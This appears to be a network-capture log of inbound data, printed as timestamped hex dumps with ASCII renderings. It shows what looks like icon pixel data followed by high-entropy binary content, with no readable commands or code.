                                                      2023-06-01 10:14:23 UTC133INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2023-06-01 10:14:23 UTC140INData Raw: ff e6 94 2f ff cd 8c 28 ff bb 94 3d ff bc 94 3b ff bc 95 3b ff bc 97 3b ff bd 98 3b ff bc 93 2e ff bc 92 27 ff bb 8f 21 ff ba 94 25 ff bd 8e 21 ff c1 8e 2f ff bb 8e 18 ff b9 8e 15 ff b9 8e 15 ff b8 8f 15 ff b8 8e 13 ff b8 8f 14 ff b7 8e 13 ff b4 8d 12 ff b4 8d 11 ff b4 8d 11 ff b4 8c 11 ff b3 8b 10 ff b1 8a 0e ff b0 89 0f ff ae 88 0d ff ad 87 0c ff ad 86 0b ff af 85 0d ff b5 86 13 ff c4 89 21 ff d4 8e 2d ff d9 92 33 ff d7 91 33 ff c8 88 25 ff b2 7e 10 ff ac 7c 0a ff ae 7d 0b ff ac 7a 0a ff ab 79 09 ff b2 77 0a ff c4 74 09 ff c3 70 08 ff ba 6b 08 ff b1 66 08 ff a7 60 08 ff 9e 5b 07 ff 95 56 07 ff 8f 54 09 ff 98 60 19 ff a0 6a 26 ff 80 4c 0f ff 42 22 03 ba 03 04 05 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 03 05 1f 5e 37 08 b5 ba 75
                                                      Data Ascii: /(=;;;;.'!%!/!-33%~|}zywtpkf`[VT`j&LB"^7u
                                                      2023-06-01 10:14:23 UTC148INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 07 02 40 7b 4c 26 f4 ae 75 47 ff ab 6e 42 ff a7 69 3c ff a6 68 3a ff a6 67 39 ff a7 68 39 ff bc af a6 ff c5 cc cc ff ab 8e a6 ff 8d 76 88 ff 81 6a 7d ff 46 3d 45 ff 16 17 16 ff 1b 1c 1b ff 1c 1b 1b ff 1e 1e 1e ff 20 20 1f ff 21 21 20 ff 23 23 23 ff 24 24 24 ff 26 25 25 ff 27 27 27 ff 28 28 28 ff 2a 2a 2a ff 29 29 29 ff 2b 2b 2b ff 29 29 29 ff 29 29 29 ff 2a 29 29 ff 29 28 28 ff 29 29 29 ff 27 27 27 ff 28 28 28 ff 27 27 27 ff 25 25 25 ff 24 24 23 ff 23 23 23 ff 24 24 24 ff 21 21 21 ff 21 21 21 ff 1f 1f 1f ff 1f 1f 1f ff 1d 1d 1d ff 1c 1c 1c ff 1b 1b 1a ff 1a 1a 1b ff 19 1b 1d ff 16 1a 1c ff 4d 2f 19 ff 6e 3b 15 ff 6c 3c 1a ff 7e 50
                                                      Data Ascii: @{L&uGnBi<h:g9h9vj}F=E !! ###$$$&%%'''(((***)))+++))))))*)))(()))'''((('''%%%$$####$$$!!!!!!M/n;l<~P
                                                      2023-06-01 10:14:23 UTC156INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2023-06-01 10:14:23 UTC164INData Raw: ff c1 81 30 ff bf 7d 28 ff c3 a8 86 ff cd d0 d6 ff b6 ab b6 ff ac 95 a9 ff b5 9a b2 ff a5 92 a2 ff 89 7d 88 ff 94 84 98 ff c9 af 87 ff db a8 5d ff b3 a4 88 ff 69 6d 6c ff 21 28 2c ff 24 29 2c ff 26 2b 2e ff 26 2c 2e ff 27 2c 2f ff 27 2b 2f ff 26 2c 2e ff 25 2a 2d ff 24 29 2c ff 21 27 2a ff 27 2d 30 ff 6b 77 80 ff ca ce d3 ff c8 cc d1 ff c8 cb d0 ff d4 d6 d8 ff c4 c3 c4 ff af ae ad ff 9a 9d a0 ff ab b0 b7 ff d0 d3 d6 ff c8 cc d0 ff ca d0 d7 ff a5 7b 50 ff 93 4c 05 ff 90 4e 0a ff 89 4b 0a ff 82 47 0a ff 7b 43 09 ff 77 42 0c ff 84 52 20 ff 81 52 22 ff 49 22 04 e0 0b 07 04 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 07 03 2f 83 51 1a e6 bf 84 3c ff be 81 38 ff ba 7d 30 ff bb 7d 2f ff bd 7d
                                                      Data Ascii: 0}(}]iml!(,$),&+.&,.',/'+/&,.%*-$),!'*'-0kw{PLNKG{CwBR R"I"(/Q<8}0}/}
                                                      2023-06-01 10:14:23 UTC172INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2023-06-01 10:14:23 UTC179INData Raw: ff 1d 1d 1d ff 1a 1a 1a ff 19 19 19 ff 17 1b 1d ff 24 20 1d ff 65 37 16 ff 72 42 20 ff 7c 50 2f ff 32 17 08 b6 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 60 39 1f c8 b0 73 48 ff a3 68 3d ff 7d 50 30 ff 78 55 3e ff 80 7e 7f ff 68 66 69 ff 4f 4d 4f ff 3f 3e 3f ff 1f 1f 1f ff 23 23 23 ff 24 24 24 ff 27 27 27 ff 2a 2a 2a ff 2b 2b 2b ff 2c 2c 2c ff 2e 2e 2e ff 2d 2d 2d ff 2e 2e 2e ff 2f 2f 2f ff 2e 2e 2e ff 2f 2f 2f ff 2f 2f 2f ff 2d 2d 2d ff 2c 2c 2c ff 2b 2b 2b ff 29 29 29 ff 28 28 28 ff 27 27 27 ff 24 24 24 ff 21 21 21 ff 1e 1f 21 ff 3d 2a 1d ff 6d 39 15 ff 74 46 24 ff 75 49 2c ff 23 0e 04 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: $ e7rB |P/2`9sHh=}P0xU>~hfiOMO?>?###$$$'''***+++,,,...---...///...//////---,,,+++)))((('''$$$!!!!=*m9tF$uI,#
                                                      2023-06-01 10:14:23 UTC187INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 01 80 00
                                                      Data Ascii:
                                                      2023-06-01 10:14:23 UTC195INData Raw: b6 73 52 ef f8 55 c6 bb d0 ba ec 86 ae fb 6d ab 3f ae 0a fb 94 81 46 f1 41 2d 87 1f f8 c1 79 58 f6 df 62 86 c9 e4 53 01 96 76 cc d3 c5 b7 5c 47 8c 31 de 82 45 49 06 8f 9a b5 e8 89 6f e7 e8 a4 39 61 43 f3 25 8b 93 fb 8c 14 70 be a3 aa b3 8e 20 f4 6e 30 fd c4 f3 d7 53 61 71 d2 3e 67 ec 74 48 e1 16 2d 9c be 53 9b 34 88 b5 08 d4 b4 9c d1 70 5a ff a2 17 58 81 29 f5 78 f0 36 82 88 d4 95 0c 69 a6 2b 6b b7 82 20 62 68 00 4e 6e 20 87 6f 40 48 eb 1b 9d 72 94 39 df 4d 2f ff 79 f3 c2 ed ca 97 aa 77 99 90 9d f8 78 1d 91 85 a9 7a 77 8c 76 a5 0f f8 fe 26 08 05 e8 5c a3 ec 80 98 fd ad c6 87 72 5a 4e f7 b7 b1 10 0a 6c f2 dd 9b bc 40 de c0 eb 3b 0d 25 86 bb 2b fd c6 9c 5a 54 ee 9d 98 17 4b 4f 25 5d 50 41 b6 d2 04 f4 e6 10 46 6a d3 27 d3 20 9b 87 4f bc 97 d5 80 2f 98 40 15
                                                      Data Ascii: sRUm?FA-yXbSv\G1EIo9aC%p n0Saq>gtH-S4pZX)x6i+k bhNn o@Hr9M/ywxzwv&\rZNl@;%+ZTKO%]PAFj' O/@
                                                      2023-06-01 10:14:23 UTC203INData Raw: a2 99 f1 2c 57 c9 be 8d b3 78 2c 95 27 c0 0c 70 1d b1 d1 df 43 7c ba 30 9d e4 ea 7f 27 4f 29 b4 cc 3c 6a 77 0e dd 44 08 e0 28 d1 d0 08 1b c5 16 90 e4 0b 6b dd 5d 3b 86 be ad 3e 67 e1 32 a8 51 02 ac 0f 69 17 17 7c 92 7d 38 5d 54 62 1b fa 0a f4 c7 0d 5d 18 97 7b 74 82 cb bb d6 35 b7 6f 4c 75 cf 42 28 46 20 e6 05 4a 3c b4 6b 23 92 2c 19 5b da af 21 6f 89 ec 78 e4 ad d3 63 4f 78 cd 71 5e ab 57 93 3b 2b d6 29 78 84 00 e8 9a 75 9d 53 2f ae 01 c5 16 22 0c ac 96 16 83 43 18 8d 6b 4a ed dd 54 56 8d 4f 9e be 85 a0 68 c4 ae cc c5 05 31 03 7c 5d e8 0e 5d e3 32 e3 79 e3 e7 17 77 39 d0 d8 56 60 4f df 2a 7b e2 af 2a ae 60 52 d5 54 0d 52 9a 6d 80 71 3b 5e 99 7f 21 13 d7 bf 43 6d c5 40 d1 cb 81 78 98 b7 fb 3b 29 c3 67 ec a8 5d 5d 56 26 fd a9 51 9b e8 69 a6 46 8d 92 2f 19
                                                      Data Ascii: ,Wx,'pC|0'O)<jwD(k];>g2Qi|}8]Tb]{t5oLuB(F J<k#,[!oxcOxq^W;+)xuS/"CkJTVOh1|]]2yw9V`O*{*`RTRmq;^!Cm@x;)g]]V&QiF/
                                                      2023-06-01 10:14:23 UTC211INData Raw: ef e2 f5 32 27 b2 4b 10 3d b1 4a 92 b2 8c 61 10 43 58 2e 7a b1 e8 a3 98 15 52 66 02 a2 ea b5 da e2 9b b3 17 f9 b7 50 2d 7e 18 42 fa 21 04 aa 8a 04 be 06 6c b5 19 83 0b c6 73 02 c4 b0 81 08 7e d1 0f 44 d9 74 82 d0 af 6d 21 19 2d 78 db 47 f1 59 2c f9 e1 d3 80 ef 41 a7 58 50 8e 92 8e 00 ad 04 2d 5e cc de 9d 14 38 15 f8 e2 e2 44 e4 07 27 71 aa 20 0a df b9 52 b0 b9 60 df 91 be b3 d3 a4 a4 10 93 ef ac 1c 22 cc bc 09 cc 76 5b ff 61 3b f8 d4 00 70 4a d4 03 65 30 84 e7 08 07 ba dd b8 e1 94 54 e0 4f d0 1f 26 8d 47 fb aa 27 a1 40 bc 4c f9 ac 64 a7 98 34 25 e5 11 b2 37 69 7d 50 95 25 2c 95 8f 42 cd 6a 68 d4 10 18 67 70 fd c3 ae 61 0b f4 a5 3d 72 22 19 bc 67 6b fc d5 b4 86 10 22 54 ee ac ba 8c 21 18 f7 9c 78 e5 75 2f f0 3f 41 a5 45 13 5e cf 9a ec 14 5f db 57 83 80 6a
                                                      Data Ascii: 2'K=JaCX.zRfP-~B!ls~Dtm!-xGY,AXP-^8D'q R`"v[a;pJe0TO&G'@Ld4%7i}P%,Bjhgpa=r"gk"T!xu/?AE^_Wj
                                                      2023-06-01 10:14:23 UTC219INData Raw: 5a 4c 86 19 0f 33 46 dc 4d e4 ce ef 88 b7 0f 5b 34 81 f3 7e 4b ed 9b 57 ef 10 71 7d c0 fb 4f c3 4b cb 19 77 84 ed be 5f 41 00 8e 1a 23 ad ef 49 d2 4d a2 97 1c aa a3 e3 d6 4a f8 aa c9 bd aa 31 ea 62 34 1f 8e ad 1b d6 fa 58 00 73 f5 51 f9 fd 0e 60 99 0f aa bb 9b fc f4 a1 38 57 b2 84 3b e9 a6 7b 1f 3c 50 f5 33 31 3e 1c 0b da 10 52 c9 5d 05 4b ca ae 03 7d 0b 93 4f 02 00 3e 34 b1 66 4b c0 7d 52 27 a0 6a 82 c9 80 27 bf 65 9b c8 3c 3a 91 87 eb 83 5b fa 4f 0f 1f 3a d7 31 57 c3 8d 75 bd 27 91 99 ee b1 f7 8b e3 3f a9 e4 53 f0 a9 29 fb 74 35 91 96 01 12 03 f7 b4 7e 62 f8 2b 7a b2 ed 56 de aa ca 5a 65 cc 78 9b ec f9 8b 21 da cb 5f 67 3a aa ed 68 92 9a 33 19 a8 82 49 2a bd 36 97 c6 b0 a7 03 9a f8 7f b1 2e 14 4d 32 4d f5 5e b3 a3 94 f6 7b b8 3e 16 46 88 5d 93 de 95 b2
                                                      Data Ascii: ZL3FM[4~KWq}OKw_A#IMJ1b4XsQ`8W;{<P31>R]K}O>4fK}R'j'e<:[O:1Wu'?S)t5~b+zVZex!_g:h3I*6.M2M^{>F]
                                                      2023-06-01 10:14:23 UTC226INData Raw: 3b 6c 56 25 fa 57 a0 9e f4 f0 2c 59 c5 74 2b 17 93 07 c4 fa d1 70 99 1a 59 2c 0d b3 29 81 37 d5 f5 79 51 38 8e 55 c7 20 79 ac cb e5 67 40 93 f1 7a 99 5d 5c dc b4 88 51 56 82 f6 f3 d6 ab 17 44 49 cb e4 ee 0b 1e fa 92 c1 33 38 77 75 a9 37 96 c8 a5 65 dd 21 76 d4 5f a9 22 9a e1 c9 4f 08 5e 75 e7 86 e8 4e 2c fd a3 a0 73 7d 8b 94 f4 8d 9b ad 15 07 c2 39 c3 77 0f b5 1a e2 b9 10 f3 68 76 be d5 de c5 a7 55 3b 11 37 24 37 cb 23 2a 20 5b 7b ef 2d 61 1c 9b 63 c9 27 b2 c0 94 c1 62 8d 22 93 47 25 0c 54 1b 6c fd 05 41 6d 14 6d 96 6d 95 6b 1b 92 9c d3 d1 a6 90 8a b5 c1 3f 05 88 89 93 e5 9b aa 49 1d d5 66 36 0a 80 e7 3a 32 b5 ee 59 5a ce 63 89 bf e6 26 26 f6 c6 2a 70 44 dd c1 ba 5d 72 08 b5 54 23 ba d9 b2 bf d6 fb a7 a8 ac 0b 31 59 d2 65 c6 d9 6d 69 31 16 82 e1 c3 26 ec
                                                      Data Ascii: ;lV%W,Yt+pY,)7yQ8U yg@z]\QVDI38wu7e!v_"O^uN,s}9whvU;7$7#* [{-ac'b"G%TlAmmmk?If6:2YZc&&*pD]rT#1Yemi1&
                                                      2023-06-01 10:14:23 UTC234INData Raw: e0 fb 87 c0 49 dc 32 fc 9d 3a 56 f5 c3 30 0a ad fc da 23 b7 34 53 90 4f 23 57 66 69 e8 14 af d3 44 f1 7d 99 7e 61 85 5f 82 03 3e b7 de c0 43 70 52 76 e9 a6 93 f8 69 48 c8 b9 ea 6e 16 a7 cd ca 82 af 13 28 fa 7b c0 f2 5e 7a 9e 0d 9d e3 17 e5 32 cf 1e 82 45 5e 4d 3d 1a 56 95 4a c0 52 e2 10 51 c4 5a 5a 35 d4 71 84 62 d9 13 b6 b2 dd ef c2 4c df 98 e1 8c c7 22 f7 e1 05 83 71 fa 8e ef 71 49 5f 48 e4 65 3c 12 ab a4 0d 33 83 e9 7b 76 0d be 14 3b ba 3e 33 1a ed 27 07 83 ea 2e ee 16 e9 bb d8 e9 ed 9a bc 65 0c ee 96 06 a7 46 16 b1 a4 ff cf 71 28 f0 3e 7b 9f 62 fd 8c 51 c6 70 51 0c 59 61 4a b3 2a b0 df 85 11 87 6e db 9f db 4c 28 fc fc d2 4d 3d 47 a9 d9 b3 f7 0c 1a 0c 1c 9c 94 67 00 69 9f 21 be c9 b6 b2 7c 6e 13 18 95 4c 26 e8 3f 8e 63 d2 c9 fa 0e de 45 9c e8 24 1b 3c
                                                      Data Ascii: I2:V0#4SO#WfiD}~a_>CpRviHn({^z2E^M=VJRQZZ5qbL"qqI_He<3{v;>3'.eFq(>{bQpQYaJ*nL(M=Ggi!|nL&?cE$<
                                                      2023-06-01 10:14:23 UTC242INData Raw: 7b d9 8a f1 a3 e6 7e f8 77 0e 79 87 74 3e 65 8d 44 bc 6b 7e 50 a6 4d ac ae b6 d6 4c 64 86 36 c8 29 de 7e de 3f 93 ac 46 83 ff 79 89 cb 9e cf 70 c5 7e f8 94 4a 01 59 b6 9c e8 cc b8 98 58 b7 3c 86 c5 b4 60 af 02 fa a6 6f b0 48 d4 d9 9a c5 16 30 e1 90 08 1e 15 f5 f5 9c c6 0e f6 7a 9a df f2 21 dc af ad 28 45 31 f8 a1 35 3a f4 be 63 e6 bc 84 4f d3 36 9c c4 19 d6 ea f9 90 c5 df 4c 80 75 8c f1 66 0c 58 64 d8 77 18 ff 33 60 07 d9 3c a2 2c 56 18 f1 a6 a1 b7 77 b5 f5 d7 3d 83 30 8a 04 f4 63 d7 5d bb cf 9d 4b 81 30 53 8c 52 d8 96 99 90 cb d3 97 3e 6b eb 82 ee b7 3d 12 50 b8 d2 38 4a 98 b7 e7 d4 a9 e0 7e 99 f7 f2 36 2e 2d 5c 1a f7 0c f7 ed c2 46 e4 fa 55 01 dd b2 ae e3 6b 19 46 67 3d 81 ca bb 7d ed 79 0c b2 69 d7 c1 0c 19 14 10 af ea 14 5c 34 5c ff 6f 08 ff 33 00 6e
                                                      Data Ascii: {~wyt>eDk~PMLd6)~?Fyp~JYX<`oH0z!(E15:cO6LufXdw3`<,Vw=0c]K0SR>k=P8J~6.-\FUkFg=}yi\4\o3n
                                                      2023-06-01 10:14:23 UTC250INData Raw: f8 fc c3 29 08 48 ec 83 78 9d 4d 5f 44 8e d1 c6 a3 2a 5f ca 58 d7 d8 bf 3e 87 10 d3 b2 53 b0 45 0c fd a5 6d 13 2c c7 52 b6 43 18 31 2d 1f f2 e9 33 26 ce 57 9a a6 58 4a 63 a9 73 bd 9c b9 a2 38 25 d3 43 ed 34 9f 4d 6f e5 53 4a 28 9c ff 37 07 c6 c1 26 9b e7 74 6b a8 b8 a4 6a e1 2c ee 61 16 76 1d 81 82 2b 11 d4 d9 7f 00 40 c4 23 d1 c3 d2 f6 02 e5 b8 11 8a 2d 7c 69 82 bd 33 17 7d e0 eb ca 1a f2 0f 82 81 79 d0 af 23 4b 7b d0 9d 14 87 c3 b9 85 ad b3 b5 5e 57 2a 10 f9 6f 08 02 f6 5c 99 5b 2e 47 3d b3 12 4a fc c8 ab 32 02 be 14 a2 26 66 e7 8c 27 8c 7a 1a df 83 4f f6 b8 be ed d6 be 2e bf 9c b7 9e c4 75 dc 19 14 69 3b 67 c4 99 97 09 91 b8 16 5b 79 c1 da 31 bd 0c ec dc 0e 91 e1 64 e5 23 65 71 b2 3a f4 0d d9 ea 2e e4 7d b8 d7 27 0e 11 b4 bf 76 fc 6a bb 9f 8e 15 eb aa
                                                      Data Ascii: )HxM_D*_X>SEm,RC1-3&WXJcs8%C4MoSJ(7&tkj,av+@#-|i3}y#K{^W*o\[.G=J2&f'zO.ui;g[y1d#eq:.}'vj
                                                      2023-06-01 10:14:23 UTC258INData Raw: 10 bb d1 c1 48 91 a8 c5 03 2d fa 0b f8 cf ba 9c 0e 94 7f 87 e0 cc 34 f4 c1 f3 8c c2 09 9b 82 5a 52 fe 18 91 0c dd a5 ac eb bf 9d cc 4a 20 3f 67 3a a5 71 c2 11 7b de 7d 94 f7 81 51 6e 90 77 b8 7c 80 c7 27 5f af bc f8 a4 46 84 95 5c 70 3c f1 a9 ab 22 20 90 a2 1e 02 f0 e5 c9 93 be 4b 31 ba 25 43 31 5a a5 b2 15 d6 c5 bc 1b 88 55 92 3a a8 8c 23 c2 0f 00 3d 6e 77 9e 01 21 d3 cf 02 2a f5 a6 02 8b d0 65 d6 9a 3d ca 12 30 c3 1b 05 a5 9d a2 45 54 7a 9b 58 fc bd 52 a1 5c 99 3e 38 b9 96 f0 9b c9 47 8d ef 9d 21 f9 7e 36 59 8d e8 1f b3 90 de 76 f6 b8 6d a6 c6 6a e1 0f ee 3c 59 93 4d ca 79 90 1c 1e e0 80 b7 3e 24 23 d1 bd 74 13 40 00 be fa e7 a7 94 67 c7 d2 42 56 aa ee c0 fa f6 e7 a5 5a 35 47 18 19 d0 ae 11 bf 75 78 00 56 de 0b 40 88 81 01 62 ff 4c 1d 45 9f b1 58 44 d4
                                                      Data Ascii: H-4ZRJ ?g:q{}Qnw|'_F\p<" K1%C1ZU:#=nw!*e=0ETzXR\>8G!~6Yvmj<YMy>$#t@gBVZ5GuxV@bLEXD
                                                      2023-06-01 10:14:23 UTC265INData Raw: 95 88 ff 63 a6 c3 a0 2e 7f f8 03 06 15 9d 98 cf b9 9f 48 97 c5 0a 92 3b 30 71 8c 5c 2e 30 9f b6 4d fe 46 a7 94 46 11 f4 2f 30 41 fc cd c8 64 a6 4d b5 f9 e0 dd 7b b2 65 5b a7 ca 7e dc 4b 2b d7 14 63 c2 59 fd 80 4d 48 89 88 bd f8 c0 d5 86 ef 43 1c 13 f5 c2 25 6d 94 c4 99 45 87 b6 09 1e d6 d7 7c 18 31 f8 0e 3f 36 62 0b 87 29 dc 45 43 9e 26 74 40 66 72 9a c8 28 ff 77 3f 33 a1 7a 5d e9 ab 91 b3 11 5f 3c b8 30 61 e0 8f 18 95 82 0a 7d af 64 b8 dc 24 33 d0 11 9b 9f f3 70 a4 dc 71 14 b6 a3 20 07 26 74 22 27 ca 05 3e b2 92 13 86 33 f9 81 55 ed f6 6e cf 96 1a 8a 28 d9 95 7a 2c 61 ff f8 aa e3 9f 70 27 29 58 2e d1 b5 d4 6b b5 fd fe 37 ef 0d 38 91 47 37 5f da 0a d7 c1 5c f7 49 b4 8e d1 66 4b ed ac 08 9e f0 fa bd 4b 96 b2 72 d6 eb 78 ae ed f4 f2 83 65 4e 56 5a 92 2e e6
                                                      Data Ascii: c.H;0q\.0MFF/0AdM{e[~K+cYMHC%mE|1?6b)EC&t@fr(w?3z]_<0a}d$3pq &t"'>3Un(z,ap')X.k78G7_\IfKKrxeNVZ.
                                                      2023-06-01 10:14:23 UTC273INData Raw: 0a fd 19 3a 6b 74 2f 05 bd b2 a0 f1 ac 41 cb 98 11 58 f3 2f cd 20 13 f2 df 0b f8 8d 1b 98 18 b8 fa 7f cc 2f b9 a9 87 44 67 9c 34 6d 2f 63 c6 4d d7 5b 1b 57 98 72 21 4b 58 cb 0f 28 4d cd 6d e9 74 aa a3 3b 91 f8 65 fc aa 0e 54 8a 2a 21 a2 14 17 d6 86 da 7c 6c e8 94 9a 40 d1 b1 b5 51 e1 3c d3 96 74 3e ba 03 66 4e b3 fc 95 e1 b0 c4 a9 87 e5 f9 a5 df 05 2d e7 1e 5f e8 dd a7 a9 00 39 38 da 19 9f 31 01 93 0a 77 1a d5 4e d5 47 8b 1f de 40 79 b7 ad e7 25 1b ba 80 30 e1 4b d3 6a f0 d6 c0 6b 5a 33 42 34 ed 73 92 a0 1b ee d1 2f a8 f8 4d fb b2 ee 10 58 af b5 8a d6 df 73 99 a2 e3 6b b7 50 82 c2 68 e0 36 92 ec 8d ef f7 0f 7e 76 a2 a1 37 eb a0 13 f2 f8 60 a2 7d 10 16 7c 2e 05 be 4c eb b9 47 d5 da 95 cc 68 c3 d4 f5 36 61 b4 23 8c f1 43 6b ae 80 05 67 e0 8c 6e 29 45 1a b6
                                                      Data Ascii: :kt/AX/ /Dg4m/cM[Wr!KX(Mmt;eT*!|l@Q<t>fN-_981wNG@y%0KjkZ3B4s/MXskPh6~v7`}|.LGh6a#Ckgn)E
                                                      2023-06-01 10:14:23 UTC281INData Raw: f9 9c 33 61 b2 bd b6 aa 7c 46 6f 7a d7 82 95 5e 27 b3 f1 d6 4f 42 27 94 ca ae 4a a6 e4 9f 74 7e b7 47 91 c8 4c 12 d7 9e 7b 77 f0 8f 91 d0 9a dc 8e 61 c4 11 ef 9a 7c c5 58 cd d8 e4 2e 08 13 63 fe e7 ef 3e f1 82 c1 a6 74 b2 50 cf cf 97 df 97 2b de f6 13 ab 23 ec 92 19 c4 2a 82 c1 be 5a 29 fc 92 51 5e 28 fc 79 fb 44 83 b8 b8 35 fe d9 e7 f6 2d 1f 27 07 38 9b 00 dc c9 3a cb bd 64 e0 33 cc 28 18 0a db 00 1a 8d 91 32 a0 6f a3 7a 69 32 d4 f2 50 5d ce f6 17 a3 b3 b9 e9 39 3e 23 5a 3e a8 4b 9f 02 8f be b7 5f 59 4a 97 20 51 e3 94 49 99 b5 03 2d 18 45 ee 35 41 3d 45 0c 80 32 c4 51 0c 95 21 f5 61 e9 cd f2 11 7b 55 71 ed 0c 00 8d f6 2e a0 29 88 a5 e8 96 b1 17 25 a2 25 02 9a a9 75 ff 41 9a bb 5c 9b 5d 2a 5d a9 bd 7e 2f 26 fe c8 32 9d 3f 89 70 e6 5e f0 ec 9d e0 a9 44 10
                                                      Data Ascii: 3a|Foz^'OB'Jt~GL{wa|X.c>tP+#*Z)Q^(yD5-'8:d3(2ozi2P]9>#Z>K_YJ QI-E5A=E2Q!a{Uq.)%%uA\]*]~/&2?p^D
                                                      2023-06-01 10:14:23 UTC289INData Raw: f6 08 a7 ee 45 10 70 3b 2f cb 29 d6 9e a2 d6 32 65 70 38 88 e0 d5 55 85 37 a6 86 68 0f 40 40 16 49 af 87 41 c6 55 ae 68 b3 5c 0a 70 64 48 92 70 fe bc ae 05 b3 cd 13 48 ef 88 a8 44 97 65 61 7e 29 c6 6d b0 35 f2 b6 59 cf 0f ae 0e 80 d3 cf ef f5 ea 03 93 2a ba 5a 25 35 d7 08 65 9f aa d5 b9 60 da b3 2d 55 2d a8 ab 5b 33 cf 47 83 ca b2 b2 0d 01 d5 17 f3 f4 38 16 eb 93 88 5a a7 00 06 a6 47 55 65 b3 d3 a8 b5 7a a3 8b c2 00 98 12 ac f8 0b f5 ff b4 ce 27 71 c5 75 44 9f ed b5 62 34 58 00 3f da f5 d6 fc e3 75 42 38 ea 16 4a 9b 86 27 2b 09 ac d3 c1 8f 4e 33 fb e2 1c 1e 94 08 2f 87 0e a6 59 a6 e9 a2 5b 4b ec 70 4e 2a 14 04 c4 f3 dd 30 87 02 a0 19 76 43 1f f2 17 8d 7e d1 25 1c 0e 85 af 3f ab 85 e7 04 31 aa 10 a9 69 6e 74 7d 10 5d 84 b4 73 f9 6e c5 26 63 79 5a cb 86 b4
                                                      Data Ascii: Ep;/)2ep8U7h@@IAUh\pdHpHDea~)m5Y*Z%5e`-U-[3G8ZGUez'quDb4X?uB8J'+N3/Y[KpN*0vC~%?1int}]sn&cyZ
